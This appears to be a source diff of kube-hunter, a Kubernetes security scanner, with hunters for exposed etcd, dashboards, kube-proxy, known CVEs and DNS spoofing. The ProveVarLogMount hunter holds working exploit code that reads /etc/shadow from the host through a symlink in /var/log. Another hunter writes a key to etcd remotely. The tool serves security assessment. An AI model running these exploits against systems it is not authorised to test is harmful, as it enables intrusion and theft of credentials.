logger = logging.getLogger(__name__)
email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")
class CertificateEmail(Vulnerability, Event):
"""The Kubernetes API Server advertises a public certificate for TLS.
This certificate includes an email address, that may provide additional information for an attacker on your
organization, or be abused for further email based attacks."""
def __init__(self, email):
Vulnerability.__init__(
self,
KubernetesCluster,
"Certificate Includes Email Address",
category=InformationDisclosure,
vid="KHV021",
)
self.email = email
self.evidence = f"email: {self.email}"
@handler.subscribe(Service)
class CertificateDiscovery(Hunter):
"""Certificate Email Hunting
Checks for email addresses in kubernetes ssl certificates
"""
def __init__(self, event):
self.event = event
def execute(self):
try:
logger.debug("Passive hunter is attempting to get server certificate")
addr = (str(self.event.host), self.event.port)
cert = ssl.get_server_certificate(addr)
except ssl.SSLError:
# If the server doesn't offer SSL on this port we won't get a certificate
return
self.examine_certificate(cert)
def examine_certificate(self, cert):
# str.strip removes characters from a set rather than a prefix/suffix, and can eat
# leading/trailing base64 characters; drop the PEM header and footer explicitly instead
c = cert.replace(ssl.PEM_HEADER, "").replace(ssl.PEM_FOOTER, "").strip("\n")
certdata = base64.b64decode(c)
emails = re.findall(email_pattern, certdata)
for email in emails:
self.publish_event(CertificateEmail(email=email))
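The whole certificate check can be reproduced in a few lines; a sketch, assuming a reachable TLS endpoint (the address below is a placeholder):

import re
import ssl
import base64

cert = ssl.get_server_certificate(("10.0.0.1", 6443))  # hypothetical target
# b64decode discards the newlines left between the PEM header and footer
der = base64.b64decode(cert.replace(ssl.PEM_HEADER, "").replace(ssl.PEM_FOOTER, ""))
print(re.findall(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)", der))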


@@ -0,0 +1,245 @@
import logging
from packaging import version
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import (
Hunter,
KubernetesCluster,
RemoteCodeExec,
PrivilegeEscalation,
DenialOfService,
KubectlClient,
)
from kube_hunter.modules.discovery.kubectl import KubectlClientEvent
logger = logging.getLogger(__name__)
class ServerApiVersionEndPointAccessPE(Vulnerability, Event):
"""Node is vulnerable to critical CVE-2018-1002105"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Critical Privilege Escalation CVE",
category=PrivilegeEscalation,
vid="KHV022",
)
self.evidence = evidence
class ServerApiVersionEndPointAccessDos(Vulnerability, Event):
"""Node not patched for CVE-2019-1002100. Depending on your RBAC settings,
a crafted json-patch could cause a Denial of Service."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Denial of Service to Kubernetes API Server",
category=DenialOfService,
vid="KHV023",
)
self.evidence = evidence
class PingFloodHttp2Implementation(Vulnerability, Event):
"""Node not patched for CVE-2019-9512. an attacker could cause a
Denial of Service by sending specially crafted HTTP requests."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Possible Ping Flood Attack",
category=DenialOfService,
vid="KHV024",
)
self.evidence = evidence
class ResetFloodHttp2Implementation(Vulnerability, Event):
"""Node not patched for CVE-2019-9514. an attacker could cause a
Denial of Service by sending specially crafted HTTP requests."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Possible Reset Flood Attack",
category=DenialOfService,
vid="KHV025",
)
self.evidence = evidence
class ServerApiClusterScopedResourcesAccess(Vulnerability, Event):
"""Api Server not patched for CVE-2019-11247.
API server allows access to custom resources via wrong scope"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Arbitrary Access To Cluster Scoped Resources",
category=PrivilegeEscalation,
vid="KHV026",
)
self.evidence = evidence
class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event):
"""The kubectl client is vulnerable to CVE-2019-11246,
an attacker could potentially execute arbitrary code on the client's machine"""
def __init__(self, binary_version):
Vulnerability.__init__(
self,
KubectlClient,
"Kubectl Vulnerable To CVE-2019-11246",
category=RemoteCodeExec,
vid="KHV027",
)
self.binary_version = binary_version
self.evidence = f"kubectl version: {self.binary_version}"
class KubectlCpVulnerability(Vulnerability, Event):
"""The kubectl client is vulnerable to CVE-2019-1002101,
an attacker could potentially execute arbitrary code on the client's machine"""
def __init__(self, binary_version):
Vulnerability.__init__(
self,
KubectlClient,
"Kubectl Vulnerable To CVE-2019-1002101",
category=RemoteCodeExec,
vid="KHV028",
)
self.binary_version = binary_version
self.evidence = f"kubectl version: {self.binary_version}"
class CveUtils:
@staticmethod
def get_base_release(full_ver):
# if LegacyVersion, converting manually to a base version
if isinstance(full_ver, version.LegacyVersion):
return version.parse(".".join(full_ver._version.split(".")[:2]))
return version.parse(".".join(map(str, full_ver._version.release[:2])))
@staticmethod
def to_legacy(full_ver):
# converting version to version.LegacyVersion
return version.LegacyVersion(".".join(map(str, full_ver._version.release)))
@staticmethod
def to_raw_version(v):
if not isinstance(v, version.LegacyVersion):
return ".".join(map(str, v._version.release))
return v._version
@staticmethod
def version_compare(v1, v2):
"""Function compares two versions, handling differences with conversion to LegacyVersion"""
# getting the raw version, stripping a leading 'v' char if it exists.
# removing this char lets us safely compare the two versions.
v1_raw = CveUtils.to_raw_version(v1).strip("v")
v2_raw = CveUtils.to_raw_version(v2).strip("v")
new_v1 = version.LegacyVersion(v1_raw)
new_v2 = version.LegacyVersion(v2_raw)
return CveUtils.basic_compare(new_v1, new_v2)
@staticmethod
def basic_compare(v1, v2):
return (v1 > v2) - (v1 < v2)
@staticmethod
def is_downstream_version(version):
return any(c in version for c in "+-~")
@staticmethod
def is_vulnerable(fix_versions, check_version, ignore_downstream=False):
"""Function determines if a version is vulnerable,
by comparing to given fix versions by base release"""
if ignore_downstream and CveUtils.is_downstream_version(check_version):
return False
vulnerable = False
check_v = version.parse(check_version)
base_check_v = CveUtils.get_base_release(check_v)
# default to classic compare, unless the check_version is legacy.
version_compare_func = CveUtils.basic_compare
if isinstance(check_v, version.LegacyVersion):
version_compare_func = CveUtils.version_compare
if check_version not in fix_versions:
# comparing each base release for a fix
for fix_v in fix_versions:
fix_v = version.parse(fix_v)
base_fix_v = CveUtils.get_base_release(fix_v)
# if the check version and the current fix has the same base release
if base_check_v == base_fix_v:
# when check_version is legacy, we use a custom compare func, to handle differences between versions
if version_compare_func(check_v, fix_v) == -1:
# determine vulnerable if smaller and with same base version
vulnerable = True
break
# if we didn't find a fix among the fix releases, check if the version is smaller than the first fix
if not vulnerable and version_compare_func(check_v, version.parse(fix_versions[0])) == -1:
vulnerable = True
return vulnerable
@handler.subscribe_once(K8sVersionDisclosure)
class K8sClusterCveHunter(Hunter):
"""K8s CVE Hunter
Checks if Node is running a Kubernetes version vulnerable to
specific important CVEs
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
logger.debug(f"Checking known CVEs for k8s API version: {self.event.version}")
cve_mapping = {
ServerApiVersionEndPointAccessPE: ["1.10.11", "1.11.5", "1.12.3"],
ServerApiVersionEndPointAccessDos: ["1.11.8", "1.12.6", "1.13.4"],
ResetFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
PingFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
ServerApiClusterScopedResourcesAccess: ["1.13.9", "1.14.5", "1.15.2"],
}
for vulnerability, fix_versions in cve_mapping.items():
if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
self.publish_event(vulnerability(self.event.version))
@handler.subscribe(KubectlClientEvent)
class KubectlCVEHunter(Hunter):
"""Kubectl CVE Hunter
Checks if the kubectl client is vulnerable to specific important CVEs
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
cve_mapping = {
KubectlCpVulnerability: ["1.11.9", "1.12.7", "1.13.5", "1.14.0"],
IncompleteFixToKubectlCpVulnerability: ["1.12.9", "1.13.6", "1.14.2"],
}
logger.debug(f"Checking known CVEs for kubectl version: {self.event.version}")
for vulnerability, fix_versions in cve_mapping.items():
if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
self.publish_event(vulnerability(binary_version=self.event.version))
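To see how the fix-version matching behaves, here is a sketch of calling CveUtils directly, assuming kube-hunter is installed (and a packaging release that still ships LegacyVersion); the fix list is the CVE-2018-1002105 mapping from above:

from kube_hunter.modules.hunting.cves import CveUtils

fix_versions = ["1.10.11", "1.11.5", "1.12.3"]
print(CveUtils.is_vulnerable(fix_versions, "v1.11.3"))  # True: 1.11.x below fix 1.11.5
print(CveUtils.is_vulnerable(fix_versions, "v1.12.3"))  # False: equals a fix release
print(CveUtils.is_vulnerable(fix_versions, "v1.13.0"))  # False: newer than every fix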


@@ -0,0 +1,45 @@
import logging
import json
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.types import Hunter, RemoteCodeExec, KubernetesCluster
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
logger = logging.getLogger(__name__)
class DashboardExposed(Vulnerability, Event):
"""All operations on the cluster are exposed"""
def __init__(self, nodes):
Vulnerability.__init__(
self,
KubernetesCluster,
"Dashboard Exposed",
category=RemoteCodeExec,
vid="KHV029",
)
self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
@handler.subscribe(KubeDashboardEvent)
class KubeDashboard(Hunter):
"""Dashboard Hunting
Hunts open Dashboards, gets the type of nodes in the cluster
"""
def __init__(self, event):
self.event = event
def get_nodes(self):
config = get_config()
logger.debug("Passive hunter is attempting to get nodes types of the cluster")
r = requests.get(f"http://{self.event.host}:{self.event.port}/api/v1/node", timeout=config.network_timeout)
if r.status_code == 200 and "nodes" in r.text:
return [node["objectMeta"]["name"] for node in json.loads(r.text)["nodes"]]
def execute(self):
self.publish_event(DashboardExposed(nodes=self.get_nodes()))


@@ -0,0 +1,90 @@
import re
import logging
from scapy.all import IP, ICMP, UDP, DNS, DNSQR, ARP, Ether, sr1, srp1, srp
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft
from kube_hunter.modules.hunting.arp import PossibleArpSpoofing
logger = logging.getLogger(__name__)
class PossibleDnsSpoofing(Vulnerability, Event):
"""A malicious pod running on the cluster could potentially run a DNS Spoof attack
and perform a MITM attack on applications running in the cluster."""
def __init__(self, kubedns_pod_ip):
Vulnerability.__init__(
self,
KubernetesCluster,
"Possible DNS Spoof",
category=IdentityTheft,
vid="KHV030",
)
self.kubedns_pod_ip = kubedns_pod_ip
self.evidence = f"kube-dns at: {self.kubedns_pod_ip}"
# Only triggered with RunningAsPod base event
@handler.subscribe(PossibleArpSpoofing)
class DnsSpoofHunter(ActiveHunter):
"""DNS Spoof Hunter
Checks for the possibility of a malicious pod compromising DNS requests of the cluster
(results are based on the running node)
"""
def __init__(self, event):
self.event = event
def get_cbr0_ip_mac(self):
config = get_config()
res = srp1(Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)
return res[IP].src, res.src
def extract_nameserver_ip(self):
with open("/etc/resolv.conf") as f:
# finds first nameserver in /etc/resolv.conf
match = re.search(r"nameserver (\d+.\d+.\d+.\d+)", f.read())
if match:
return match.group(1)
def get_kube_dns_ip_mac(self):
config = get_config()
kubedns_svc_ip = self.extract_nameserver_ip()
# getting the actual pod ip of the kube-dns service, by comparing the src mac of a dns response with arp scan results.
dns_info_res = srp1(
Ether() / IP(dst=kubedns_svc_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR()),
verbose=0,
timeout=config.network_timeout,
)
kubedns_pod_mac = dns_info_res.src
self_ip = dns_info_res[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.network_timeout,
verbose=0,
)
for _, response in arp_responses:
if response[Ether].src == kubedns_pod_mac:
return response[ARP].psrc, response.src
def execute(self):
config = get_config()
logger.debug("Attempting to get kube-dns pod ip")
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
cbr0_ip, cbr0_mac = self.get_cbr0_ip_mac()
kubedns = self.get_kube_dns_ip_mac()
if kubedns:
kubedns_ip, kubedns_mac = kubedns
logger.debug(f"ip={self_ip} kubednsip={kubedns_ip} cbr0ip={cbr0_ip}")
if kubedns_mac != cbr0_mac:
# if self pod in the same subnet as kube-dns pod
self.publish_event(PossibleDnsSpoofing(kubedns_pod_ip=kubedns_ip))
else:
logger.debug("Could not get kubedns identity")


@@ -0,0 +1,176 @@
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent
from kube_hunter.core.types import (
ActiveHunter,
Hunter,
KubernetesCluster,
InformationDisclosure,
RemoteCodeExec,
UnauthenticatedAccess,
AccessRisk,
)
logger = logging.getLogger(__name__)
ETCD_PORT = 2379
""" Vulnerabilities """
class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
"""Remote write access might grant an attacker full control over the kubernetes cluster"""
def __init__(self, write_res):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd Remote Write Access Event",
category=RemoteCodeExec,
vid="KHV031",
)
self.evidence = write_res
class EtcdRemoteReadAccessEvent(Vulnerability, Event):
"""Remote read access might expose to an attacker cluster's possible exploits, secrets and more."""
def __init__(self, keys):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd Remote Read Access Event",
category=AccessRisk,
vid="KHV032",
)
self.evidence = keys
class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event):
"""Remote version disclosure might give an attacker a valuable data to attack a cluster"""
def __init__(self, version):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd Remote version disclosure",
category=InformationDisclosure,
vid="KHV033",
)
self.evidence = version
class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event):
"""Etcd is accessible using HTTP (without authorization and authentication),
it would allow a potential attacker to
gain access to the etcd"""
def __init__(self, version):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd is accessible using insecure connection (HTTP)",
category=UnauthenticatedAccess,
vid="KHV034",
)
self.evidence = version
# Active Hunter
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
class EtcdRemoteAccessActive(ActiveHunter):
"""Etcd Remote Access
Checks for remote write access to etcd, will attempt to add a new key to the etcd DB"""
def __init__(self, event):
self.event = event
self.write_evidence = ""
self.event.protocol = "https"
def db_keys_write_access(self):
config = get_config()
logger.debug(f"Trying to write keys remotely on host {self.event.host}")
data = {"value": "remotely written data"}
try:
r = requests.post(
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
data=data,
timeout=config.network_timeout,
)
self.write_evidence = r.content if r.status_code == 200 and r.content else False
return self.write_evidence
except requests.exceptions.ConnectionError:
return False
def execute(self):
if self.db_keys_write_access():
self.publish_event(EtcdRemoteWriteAccessEvent(self.write_evidence))
# Passive Hunter
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
class EtcdRemoteAccess(Hunter):
"""Etcd Remote Access
Checks for remote availability of etcd, its version, and read access to the DB
"""
def __init__(self, event):
self.event = event
self.version_evidence = ""
self.keys_evidence = ""
self.event.protocol = "https"
def db_keys_disclosure(self):
config = get_config()
logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
try:
r = requests.get(
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
verify=False,
timeout=config.network_timeout,
)
self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
return self.keys_evidence
except requests.exceptions.ConnectionError:
return False
def version_disclosure(self):
config = get_config()
logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
try:
r = requests.get(
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
verify=False,
timeout=config.network_timeout,
)
self.version_evidence = r.content if r.status_code == 200 and r.content else False
return self.version_evidence
except requests.exceptions.ConnectionError:
return False
def insecure_access(self):
config = get_config()
logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
try:
r = requests.get(
f"http://{self.event.host}:{ETCD_PORT}/version",
verify=False,
timeout=config.network_timeout,
)
return r.content if r.status_code == 200 and r.content else False
except requests.exceptions.ConnectionError:
return False
def execute(self):
if self.insecure_access(): # make a decision between http and https protocol
self.event.protocol = "http"
if self.version_disclosure():
self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
if self.event.protocol == "http":
self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
if self.db_keys_disclosure():
self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
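The protocol decision in execute can be sketched standalone: probe /version over plain HTTP first, and only fall back to HTTPS if that fails. The host below is a placeholder:

import requests

host = "10.0.0.1"  # hypothetical node address

def etcd_version(protocol):
    try:
        r = requests.get(f"{protocol}://{host}:2379/version", verify=False, timeout=5)
        return r.content if r.status_code == 200 and r.content else None
    except requests.exceptions.ConnectionError:
        return None

# an answer over http means etcd accepts unauthenticated plaintext connections
protocol = "http" if etcd_version("http") else "https"
print(protocol, etcd_version(protocol))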

File diff suppressed because it is too large


@@ -0,0 +1,158 @@
import logging
import re
import uuid
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import (
ActiveHunter,
Hunter,
KubernetesCluster,
PrivilegeEscalation,
)
from kube_hunter.modules.hunting.kubelet import (
ExposedPodsHandler,
ExposedRunHandler,
KubeletHandlers,
)
logger = logging.getLogger(__name__)
class WriteMountToVarLog(Vulnerability, Event):
"""A pod can create symlinks in the /var/log directory on the host, which can lead to a root directory traveral"""
def __init__(self, pods):
Vulnerability.__init__(
self,
KubernetesCluster,
"Pod With Mount To /var/log",
category=PrivilegeEscalation,
vid="KHV047",
)
self.pods = pods
self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
class DirectoryTraversalWithKubelet(Vulnerability, Event):
"""An attacker can run commands on pods with mount to /var/log,
and traverse read all files on the host filesystem"""
def __init__(self, output):
Vulnerability.__init__(
self,
KubernetesCluster,
"Root Traversal Read On The Kubelet",
category=PrivilegeEscalation,
)
self.output = output
self.evidence = f"output: {self.output}"
@handler.subscribe(ExposedPodsHandler)
class VarLogMountHunter(Hunter):
"""Mount Hunter - /var/log
Hunts pods that have write access to the host's /var/log. In such a case,
the pod can traverse-read files on the host machine
"""
def __init__(self, event):
self.event = event
def has_write_mount_to(self, pod_data, path):
"""Returns volume for correlated writable mount"""
for volume in pod_data["spec"]["volumes"]:
if "hostPath" in volume:
if "Directory" in volume["hostPath"]["type"]:
if volume["hostPath"]["path"].startswith(path):
return volume
def execute(self):
pe_pods = []
for pod in self.event.pods:
if self.has_write_mount_to(pod, path="/var/log"):
pe_pods.append(pod)
if pe_pods:
self.publish_event(WriteMountToVarLog(pods=pe_pods))
@handler.subscribe(ExposedRunHandler)
class ProveVarLogMount(ActiveHunter):
"""Prove /var/log Mount Hunter
Tries to read /etc/shadow on the host by running commands inside a pod with a host mount to /var/log
"""
def __init__(self, event):
self.event = event
self.base_path = f"https://{self.event.host}:{self.event.port}"
def run(self, command, container):
run_url = KubeletHandlers.RUN.value.format(
podNamespace=container["namespace"],
podID=container["pod"],
containerName=container["name"],
cmd=command,
)
return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
# TODO: replace with multiple subscription to WriteMountToVarLog as well
def get_varlog_mounters(self):
config = get_config()
logger.debug("accessing /pods manually on ProveVarLogMount")
pods = self.event.session.get(
f"{self.base_path}/" + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
).json()["items"]
for pod in pods:
volume = VarLogMountHunter(ExposedPodsHandler(pods=pods)).has_write_mount_to(pod, "/var/log")
if volume:
yield pod, volume
def mount_path_from_mountname(self, pod, mount_name):
"""returns container name, and container mount path correlated to mount_name"""
for container in pod["spec"]["containers"]:
for volume_mount in container["volumeMounts"]:
if volume_mount["name"] == mount_name:
logger.debug(f"yielding {container}")
yield container, volume_mount["mountPath"]
def traverse_read(self, host_file, container, mount_path, host_path):
"""Returns content of file on the host, and cleans trails"""
config = get_config()
symlink_name = str(uuid.uuid4())
# creating symlink to file
self.run(f"ln -s {host_file} {mount_path}/{symlink_name}", container)
# following symlink with kubelet
path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(
path=re.sub(r"^/var/log", "", host_path) + symlink_name
)
content = self.event.session.get(
f"{self.base_path}/{path_in_logs_endpoint}",
verify=False,
timeout=config.network_timeout,
).text
# removing symlink
self.run(f"rm {mount_path}/{symlink_name}", container=container)
return content
def execute(self):
for pod, volume in self.get_varlog_mounters():
for container, mount_path in self.mount_path_from_mountname(pod, volume["name"]):
logger.debug("Correlated container to mount_name")
cont = {
"name": container["name"],
"pod": pod["metadata"]["name"],
"namespace": pod["metadata"]["namespace"],
}
try:
output = self.traverse_read(
"/etc/shadow",
container=cont,
mount_path=mount_path,
host_path=volume["hostPath"]["path"],
)
self.publish_event(DirectoryTraversalWithKubelet(output=output))
except Exception:
logger.debug("Could not exploit /var/log", exc_info=True)


@@ -0,0 +1,127 @@
import logging
import requests
from enum import Enum
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure
from kube_hunter.core.types import (
ActiveHunter,
Hunter,
KubernetesCluster,
InformationDisclosure,
)
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
from kube_hunter.modules.discovery.proxy import KubeProxyEvent
logger = logging.getLogger(__name__)
class KubeProxyExposed(Vulnerability, Event):
"""All operations on the cluster are exposed"""
def __init__(self):
Vulnerability.__init__(
self,
KubernetesCluster,
"Proxy Exposed",
category=InformationDisclosure,
vid="KHV049",
)
class Service(Enum):
DASHBOARD = "kubernetes-dashboard"
@handler.subscribe(KubeProxyEvent)
class KubeProxy(Hunter):
"""Proxy Hunting
Hunts for a dashboard behind the proxy
"""
def __init__(self, event):
self.event = event
self.api_url = f"http://{self.event.host}:{self.event.port}/api/v1"
def execute(self):
self.publish_event(KubeProxyExposed())
for namespace, services in self.services.items():
for service in services:
if service == Service.DASHBOARD.value:
logger.debug(f"Found a dashboard service '{service}'")
# TODO: check if /proxy is a convention on other services
curr_path = f"api/v1/namespaces/{namespace}/services/{service}/proxy"
self.publish_event(KubeDashboardEvent(path=curr_path, secure=False))
@property
def namespaces(self):
config = get_config()
resource_json = requests.get(f"{self.api_url}/namespaces", timeout=config.network_timeout).json()
return self.extract_names(resource_json)
@property
def services(self):
config = get_config()
# map between namespaces and service names
services = dict()
for namespace in self.namespaces:
resource_path = f"{self.api_url}/namespaces/{namespace}/services"
resource_json = requests.get(resource_path, timeout=config.network_timeout).json()
services[namespace] = self.extract_names(resource_json)
logger.debug(f"Enumerated services [{' '.join(services)}]")
return services
@staticmethod
def extract_names(resource_json):
names = list()
for item in resource_json["items"]:
names.append(item["metadata"]["name"])
return names
@handler.subscribe(KubeProxyExposed)
class ProveProxyExposed(ActiveHunter):
"""Build Date Hunter
When the proxy is exposed, extracts the build date of Kubernetes
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
version_metadata = requests.get(
f"http://{self.event.host}:{self.event.port}/version",
verify=False,
timeout=config.network_timeout,
).json()
if "buildDate" in version_metadata:
self.event.evidence = "build date: {}".format(version_metadata["buildDate"])
@handler.subscribe(KubeProxyExposed)
class K8sVersionDisclosureProve(ActiveHunter):
"""K8s Version Hunter
Hunts Proxy when exposed, extracts the version
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
version_metadata = requests.get(
f"http://{self.event.host}:{self.event.port}/version",
verify=False,
timeout=config.network_timeout,
).json()
if "gitVersion" in version_metadata:
self.publish_event(
K8sVersionDisclosure(
version=version_metadata["gitVersion"],
from_endpoint="/version",
extra_info="on kube-proxy",
)
)
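The name extraction used throughout this hunter follows the standard Kubernetes list-resource shape; a sketch with a trimmed-down sample response:

def extract_names(resource_json):
    return [item["metadata"]["name"] for item in resource_json["items"]]

sample = {"items": [{"metadata": {"name": "default"}}, {"metadata": {"name": "kube-system"}}]}
print(extract_names(sample))  # ['default', 'kube-system']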

Some files were not shown because too many files have changed in this diff